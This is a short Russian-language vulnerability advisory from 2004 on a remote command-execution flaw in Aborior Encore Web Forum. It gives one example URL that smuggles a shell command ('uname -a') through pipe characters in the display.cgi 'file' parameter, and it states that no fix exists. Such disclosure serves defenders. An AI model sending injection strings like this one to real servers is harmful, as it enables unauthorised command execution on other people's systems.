Выполнение произвольных команд в Aborior Encore Web Forum.

Дата публикации:
05.04.2004
Всего просмотров:
1389
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Aborior Encore Web Forum I

Описание: Уязвимость обнаружена в Aborior's Encore Web Forum. Удаленный пользователь может выполнить произвольные команды на целевой системе.

Пример:

http://[target]/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|uname -a|

URL производителя:http://www.aborior.com/encore/index.shtml

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Remote Exploit for Aborior's Encore Web Forum

или введите имя

CAPTCHA